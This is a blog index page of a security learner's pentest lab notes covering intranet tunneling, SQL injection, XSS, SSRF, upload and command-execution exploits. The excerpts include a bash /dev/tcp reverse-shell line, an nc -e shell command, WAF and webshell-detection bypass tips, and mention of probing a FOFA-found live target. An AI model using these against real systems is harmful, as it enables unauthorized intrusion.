自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(54)
  • 收藏
  • 关注

原创 内网安全【5】隧道搭建

也就是说目标点击后门会把流量转发到跳板机的5566端口,然后转发到kali的6666端口,我们生成后门的时候生成5566端口的后门,好让目标去找跳板机,然后监听就监听本地的6666端口即可。这里我们在生成木马的时候,监听地址应该写跳板机的,因为利用反向连接,目标主机找不到内网攻击机,下图可以看到写的后门会使当目标主机将权限给到这个跳板机的这个域名的时候,跳域名就会解析到刚才设置的攻击机的ip和端口。Frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。

2024-06-27 15:08:18 357

原创 内网安全【4】SSH隧道技术

服务器:设置密码xiaed:并创建虚拟IP及绑定域名指向iodined -f -c -p xiaodi 192.168.0.1 ns1.xiaodi8.com -DD设置密码xiaed:并创建虚拟IP及绑定域名指向。插件:https://github.com/gloxec/CrossC2。(2)ICMP协议 判断:ping命令能通说明使用icmp协议。-D:指定调试级别,-DD指第二级。“D”的数量随级别增加。-P:客户端和服务端之间用于验证身份的密码。(2)上传加载器文件和本地加载CNA插件。

2024-06-26 17:09:48 328

原创 微信小程序抓包

(1)设置Proxifier​代理服务器。(3)Burp Suite证书安装成功。(3)设置Proxifier​代理规则。1.Burp Suite 安装证书。4.burp获取小程序抓包数据。2.设置Proxifier​。(2)任务管理器获取微信地址。

2024-06-25 10:24:04 286

原创 内网安全[3]-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线

隧道技术是一类网络协议,它是一种数据包封装技术,它将原始IP包(其报头包含原始发送者和最终目的地)封装在另外一个数据包(称为封装的IP包)的数据净荷中进行传输,使用隧道的原因是在不兼容的网络上传输数据,或在不安全网络上提供一个安全路径,隧道协议通常(但并非总是)在一个比负载协议还高的层级或同一层。win7控制器链接当前win10的2222。简单来说就是通过网络隧道,可以使其隧道两端的网络进行互相通信,形成一个更到的网络,并且可以将不支持的协议数据包打包成支持的协议数据包后进行数据传输。

2024-06-21 20:00:00 511

原创 内网安全【2】-域防火墙

隧道技术原理:将TCP协议数据封装成ICMP协议数据,具体操作就是,先将tcp引入靶机本地,然后通过隧道工具换成ICMP数据传到服务器上,注意前提是已经拿到目标靶机的shell,但是因为出规则,而受到网络限制,隧道不是横向移动。限制协议:在来到出站规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 域——名字:TCP协议控制。就是通过一个有网的域内机器,去正向连接那个没网的域内机器,去获取到数据,让有网的机器去传出。出站(相对于这台主机而言,出去的网络是出站)

2024-06-14 17:29:38 351

原创 内网安全【1】——域

概念名词:局域网(自己家的手机电脑所连接的wifi) 、工作组 (学习、网吧)、内网域 (公司等大型场所)

2024-06-12 17:01:51 896

原创 微信小程序&解包反编译&数据抓包&APK信息资源提取

(4)模拟器取出wxapkg文件:/data/data/com.tencent.mm/MicroMsg/xxxxxx/appbrand/pkg。渗透角度:测试的pp提供服务的服务器,网站,接口等,一旦这个有安全问题,被不法分子利用,相当于APP正常服务就会受到直接的影响!(3)安卓系统7.0以上版本,微信7.0以上版本,微信只信任它自己配置的证书列表。(2)安装node.js:http://nodejs.cn/download/(2)安卓系统7.0以上版本,微信7.0以下版本,微信会信任系统提供的证书。

2024-06-11 20:55:32 448

原创 用友NC BeanShell远程命令执行(CNVD-2021-30167)漏洞复现

用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet目录存在远程命令执行漏洞,可通过BeanShell 执行远程命令获取服务器权限。3.网站访问/servlet/~ic/bsh.servlet.BshServlet目录,出现如下页面。2.FOFA上挑选一位存在CNVD-2021-30167漏洞的幸运儿,进行验证。(2)对BeanShell接口添加授权认证机制。貌似所有版本都存在。

2024-06-06 14:01:55 272

原创 AWVS+BP+XRAY三层联动扫描漏洞

本报告详细记录了使用AWVS(Acunetix Web Vulnerability Scanner)、Burp Suite和Xray进行的漏洞扫描结果。旨在帮助开发团队识别和修复系统中的安全漏洞,提升整体安全性。AWVS(Acunetix Web Vulnerability Scanner):专业的Web应用漏洞扫描工具,能够识别包括SQL注入、XSS在内的多种Web漏洞。Burp Suite:广泛使用的Web应用安全测试工具,集成了拦截代理、扫描器、渗透测试工具等功能。

2024-06-05 16:02:59 353

原创 漏洞发现&协议&代理池&Goby&AWVS&Xray

对于不通过https对网站或操作系统进行信息收集的程序可以使用socket5代理进行流量转发。加入白名单扫描,防Safedog拉黑IP。进去后获取key才能登录到APP。sqlmay设置代理设置随机UA头。proxifier添加代理服务器。goby登录使用邮箱和key。

2024-06-04 17:56:51 178

原创 菜刀&冰蝎&哥斯拉&流量通讯&特征绕过&检测反制&感知

请求正文全部为AES加密(AES加密的特则含有///,大小写混杂,base64加密含有=)AES加密需要知道密匙、偏移量、加密模式等。将chr的值更改为‘base_64decode’,将POST更改为REQUEST,发送成功绕过。(3)请求体中传递的payload为base64编码,并且存在面定的。2014 S_POST=S_REQUEST 2016 可以。传入的值为经过php运行结果为base_64decode。(2)请求体中存在eval,base64等特征字符。(1) 请求包,中:ua头为百度爬虫。

2024-06-03 17:46:30 453

原创 webshell代码免杀

Web Application Firewal(web应用防火墙),web应用防火通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品,基本可以分为以下4种软件型WAF:以软件的形式安装在服务器上面,可以接触到服务器上的文件,因此就可以检测服务器上是否有webshell,是否有文件被创建等,硬件型WAF:以硬件形式部署在链路中,支持多种部警方式。当串联到链路上时可以拦恶意流量,在旁路监听模式时只记录攻击但是不进行拦截,云 WAF。

2024-06-01 15:24:59 296

原创 URL跳转

开放重定向(Open Redirect),也叫URL跳转漏洞,是指服务端未对传入的跳转url变量进行检查和控制,导致诱导用户跳转到恶意网站,由于是从可信的站点跳转出去的,用户会比较信任。2.URL跳转三种方式(1)META标签内跳转(2)javascript跳转(3)header头跳转观察响应包,每种跳转方式对应的漏洞和利用方法也不同。3.漏洞产生原因(1)代码层忽视URL跳转漏洞,或不知道/不认为这是个漏洞;(2)代码层过滤不严,用取子串、取后缀等方法简单判断,代码逻辑可被绕过;(3)对。

2024-05-28 16:24:18 391

原创 CRLF注入漏洞

找到输入点【一般在请求头/后】,构造恶意的CRLF字符,添加换行符+cookie,看响应是否出现cookie值和换行。CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a)。验证方法:通过修改HTTP参数或URL,注入恶意的CRLF,查看构造的恶意数据是否在响应头中输出。Nginx会将 $uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。▶ crlfuzz -u "URL" 单个扫描。漏洞存在会显示32m。

2024-05-27 17:26:28 428

原创 web服务程序解析漏洞

nginx本身存在解析漏洞: xx.php/xx.jpg,这个xx.php文件夹下面的任意文件类型都会当作php文件解析,此时,如果php.ini配置文件开启了一个选项,叫做cgi.fix_pathinfo=1,那么会导致的问题是:www.xx.com/phpinfo.jpg/1.php,那么他会将1.php当作目录,将phpinfo.jpg当作这个1.php目录中的文件。原理:服务器默认会把.asp,.asa目录下的文件都解析成asp文件。形式:www.xxx.com/xx.asp/xx.jpg。

2024-05-24 17:26:57 550

原创 逻辑漏洞靶场通关

会员中心注册新用户test,密码123123会员中心注册新用户name,密码abcabc管理员账号admin,密码123456。

2024-05-23 18:34:59 190

原创 逻辑漏洞讲解

逻辑漏洞:又称业务逻辑漏洞,是指由于程序逻辑不严谨或者逻辑太复杂,导致一些逻辑分支不能正常处理或者处理错误。通俗的讲,一个系统功能太多后,程序开发人员难以顾及到方方面面,对于某些地方的处理可能有遗漏,从而导致逻辑漏洞。

2024-05-22 17:41:45 624

原创 越权漏洞讲解

普通用户A 拥有-> 普通用户B权限。这种类型的越权就是越权其他用户,比如说你登录了一个普通用户,但是有越权漏洞,却可以登录到其它普通用户的账号里。水平越权导致任意用户敏感信息泄露或者用户信息被恶意修改。普通用户A 拥有->管理员权限。这种类型的越权就是可以在不同身份之间越权,比如你是普通用户,但是可以越权到管理员,甚至超级管理员。管理员和超级管理员能使用的功能就比较多了。上下文越权就是说在某个程序需要执行n个步骤,而你却可以跳过其中某个步骤,直接到最后的步骤。

2024-05-21 18:04:23 400

原创 xxe漏洞--xml外部实体注入漏洞

XXE(XML External Entity Injection)是一种攻击技术,它允许攻击者注入恶意的外部实体到XML文档中。如果应用程序处理XML输入时未正确配置,攻击者可以利用这个漏洞访问受影响系统上的敏感文件或执行远程代码。XXE漏洞通常发生在解析XML数据时,没有禁用外部实体的加载。外部实体可以指向一个远程文件,如果没有适当的控制,攻击者可以利用这一点来获取敏感信息或执行攻击。w3school 在线教程。

2024-05-19 18:00:00 438

原创 内网探测的方法

网站尝试获取外网URL,外网网站打开,测试成功,网站没有对用户的请求进行过滤,导致这个输入框存在SSRF注入漏洞,可以通过它发起任意内网或外网的请求。常见端口:http 80,https 443,telnet 23,ftp 21,ssh 22,mysql 3306,redis 6379。获取主机的IP地址为:192.168.0.2,利用burp suite爆破主机及开放端口(带TCP回显的端口)复制ssrf-1.txt文件所在位置,再利用pikachu中的远程文件包含漏洞,执行端口扫描的脚本。

2024-05-18 16:59:31 143

原创 ssrf漏洞

csrf跨站请求伪造 客户端请求伪造ssrf服务器端请求伪造:是一种由攻击者构造形成由服务端请求的一个安全漏洞。一般情况下,ssrf攻击的目标是从外网无法访问的内部系统。ssrf形成原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制,导致攻击者可以传入任意地址来让后端服务器发起请求,并返回对该目标地址请求的数据。

2024-05-17 17:27:07 460

原创 反序列化漏洞【2】

对输入的flag进行反序列化(unserialize),再调用action的方法,eval任意执行。创建一个对象a,调用action的方法,让其执行命令phpinfo();最后输出a序列化后的内容。登录验证,通过正则表达式验证输入的用户名、密码位数、字符是否合法。php反序列化漏洞看代码,java反序列化漏洞需利用工具。可以对成员属性进行初始化,成员属性为user,pass。当我们序列化时使用new函数实例化类的时候就会触发。作用是将当前文件的代码以语法高亮的形式输出到浏览器。或者在对象被销毁的时候触发。

2024-05-16 17:34:24 264

原创 反序列化漏洞【1】

序列化:将对象转换成字符串,目的是方便传输,关键词serializea代表数组,数组里有三个元素,第一个元素下标为0,长度为7,内容为porsche;第二个元素下标为1,长度为3,内容为BMW;第三个元素下标为2,长度为5,内容为Volvo。反序列化:将特定的字符串转换对象,关键词unserialize反序列化成功反序列过程可以进行xss、代码执行eval、文件包含include。

2024-05-15 16:38:15 1067

原创 暴力破解漏洞

带验证码的如果是前端弹窗报错(抓包删除验证码任然能发送成功),可以禁用js绕过进行爆破也可以直接使用burpsuite进行爆破。(3)要求用户设置复杂密码(大小写+特殊字符+数字+至少8位),否则密码设置失败。(2)增加密码连续3次错误,直接锁定登录+时间,无法频繁登录。知道目标地址,端口,协议,无后端验证、用户名字典、密码字典。token【选中有效负载集2后,在选项中过滤token】抓包,添加变量,使用音叉(两者同时变,一一对应)(1)增加复杂点的验证码(滑动解锁、图文识别)密码【添加一个文件即可】

2024-05-08 17:54:34 205

原创 csrf攻击(跨站请求伪造)【2】

(2)受害者未退出登录状态,打开了新链接(黑客设计好的修改密码为admin123(原本为passwrod)的链接),导致受害者密码被更改,此时退出登录发现无法登录成功。(4)页面仍处于登录成功状态,受害者在未关闭登录页面的情况下点击了攻击链接,导致密码被更改(注:受害者不知不觉遭受攻击,只有当再次登录页面发现进不去才会发现)上面的攻击链接太明显的,参数直接就在URL中,这样很容易就会被识破,为了隐藏URL,可以使用生成短链接的方式来实现。(1)受害者将密码更改为password,显示更改成功。

2024-05-06 16:11:06 278

原创 csrf攻击(跨站请求伪造)【1】

攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。如上图所示,CSRF攻击攻击原理及过程如下:(1)用户打开浏览器,访问受信任银行网站A,输入用户名和密码请求登录网站;

2024-04-28 15:09:01 221

原创 命令执行漏洞【2】vulhub远程命令执行漏洞复现

bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (被控制端未装nc,就可以使用bash(linux都能连接))在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.被控制端 nc 10.1.1.101 6666 -e /bin/bash。可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功。(1)s2-061漏洞复现。(2)s2-059漏洞复现。

2024-04-26 09:25:31 314 3

原创 命令执行漏洞【1】

命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令,当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行漏洞。当用此连接符连接多个命令时,前面的命令执行成功,才会执行后面的命令,前面的命令执行失败,后面的命令不会执行,与 || 正好相反。当用此连接符连接多个命令时,前面的命令执行成功,则后面的命令不会执行。

2024-04-18 11:28:08 1176

原创 文件包含漏洞

能够读取或执行包含本地文件的漏洞,称为本地文件包含漏洞。有传参的地方很有可能存在文件包含漏洞。文件包含不看后缀。

2024-04-13 15:04:10 519 3

原创 文件上传【2】--靶场通关

上传2.php文件显示文件类型不正确,抓包更改文件类型为image/png,放行即可。访问上传的php文件,进行抓包,添加参数?上传文件,进行抓包,没有抓到,说明这里的验证是前端js验证跳出的弹窗。上传php文件并抓包,修改类型和在上传的文件前加上文件头GIF89a。截断时选中%00,使用URL解码后(不使用解码,上传失败),进行放行。上传2.php文件,并保存为2.php/. 抓包进行放行。文件类型更改后放行,文件上传成功,木马连接成功。发现更改重新上传后,显示上传成功,回显如下。

2024-04-12 13:46:47 865

原创 文件上传【1】

上传文件时存在上传类型固定(jpg、png、gif)如果是前端确定(弹窗,后端未出现请求确定是前端)只需要在设置中禁用js代码或抓包更改文件后缀名就可以上传其他类型的文件(亦可用于复制文章内容)。将一个图片以文本格式打开(这里用的notepad++.以记事本方式打开修改也能连接成功,不过修改后图片无法正常显示了),(1)文件只过滤php文件,并未过滤php3和php5时可将含有木马的文件名更改为php3或php5。后端调用函数(会验证图片后缀名、类型、图片尺寸大小),就需要上传图片马。

2024-04-07 17:31:25 240

原创 任意文件下载漏洞

(2) Web应用程序可以使用chrooted环境访问包含被访问文件的目录,或者使用绝对路径+参数来控制访问目录,使其即使是越权或者跨越目录也是在指定的目录下。(1) 数据净化,对网站用户提交过来的文件名进行硬编码或者统一编码,对文件后缀进行白名单控制,对包含了恶意的符号或者空字节进行拒绝。“../../../../../../../etc/passwd“ 或者”../../../../boot.ini“,filename= %66%61%6E%2E%70%64%66“来绕过。

2024-04-03 21:00:00 273

原创 xss【2】

钓鱼攻击利用页面,fish.php黑客钓鱼获取到账号密码存储的位置。

2024-04-01 09:56:32 418

原创 xss攻击【1】

xss跨站脚本攻击,是指网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上进行执行,从而达到攻击者目的。靶场:BlueLotus可以制作xss的payload,查看获取的cookie值通过xss获取cookie值后可直接登录页面跨站:不同的网站,每一个网站,浏览器都会单独存储它的cookie如何区别不同的网站:协议(http和https)+主机(ip和域名)+端口。

2024-03-23 17:00:46 599

原创 sql注入【7】

d.安装防护软件WAF (D盾、安全狗、waf代理工具代理(git下载httpwaf)等。d.multipart 请求绕过,在post请求中添加一个文件上传,绕过绝大部分WAF。a.关键字可以绕过%(只限IIS系列),select sel%e%ct。b.通杀的,内联注释。c.怎加转义符(将‘ “ /或空格 )等进行转义添加/或不显示)专门过滤get请求参数,专门post请求参数,过滤header。e.参数绕过,复制参数。如and可以用&&再加URL编码。条件:开启xp_cmdshell。

2024-03-21 18:08:08 148 1

原创 sql注入【6】-salmap工具使用

aspx的一句话是: ",1 into outfile "站点根目录(将\变为\\或/)+写入的php文件名称"post请求需要burp抓包后复制请求头,并保存在kali中,使用-r+burp抓包的文件 -p+注入参数(passwd/uname)sqlmap -u +"存在注入点的网址",其中-u只支持get请求,

2024-03-20 17:28:25 422 1

原创 sql注入【5】

除了可以写成%df,还可以写成%d2、%d2、%c2等,只要后面是5c,通过16进制和5c组成一个汉字即可,这样就可以绕过magic_quotes_gqc。猜长度,还是用burpsuite,并在位置进行修改参数(长度的参数只有一个),修改线程为1(时间型盲注必须修改线程为1) ,进行攻击,布尔型sql盲注特点:页面只有两个,正确的时候是一个页面,错误的时候是另一个页面,不会爆出库和表,后台代码写死。猜数据库名,猜对猜错看页面的返回时间,猜错了秒返回。猜库名的每一个字符,库名的参数有两个,用burp,

2024-03-18 17:00:51 335

原创 sql注入【4】

语法:updatexml(目标xml内容,xml文档路径,更新的内容)0x7e是16进制中的一个特殊符号~,报错~~updatexml()是更新xml文档的函数。1.判断注入方式是字符型注入,但未显示字段。2.报错方式判断库名。3.报错方式判断表名。

2024-03-16 19:45:00 717 1

原创 sql注入【3】

ncat(将所有的结果进行拼接展示)和limit(限制查询结果的行数),建议使用limit,因为如果网站源码设的显示位数少,那使用group_concat会导致表名显示不全,若使用显示不全的表,会导致库中无此表情况出现。/ id=1' and 1=2--空abc 报错为字符型,abc存在的意义就是防止空格被省略,所以可以为任何字母几个都可以。闭合方式:单引号',双引号",单引号+括号'),双引号+括号"),单引号+双括号')),双引号+双括号")),id=1 and 1=1#--空a和?

2024-03-15 18:45:00 887 1

原创 sql注入【2】

group_concat多行合并一行,information_schema库名(固定),SCHEMATA(表名),一旦有漏洞即可获取数据库信息。数据库的账号密码存储在同一个地方,存储在mysql.user,一旦存在漏洞即可注入获取。updatexml需要报错,账号密码大概率是字符型。表示注释:#或(--空格)或/+#payload(用于在数据包或者。请求中携带有效信息的那一部分)

2024-03-14 17:25:11 340 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除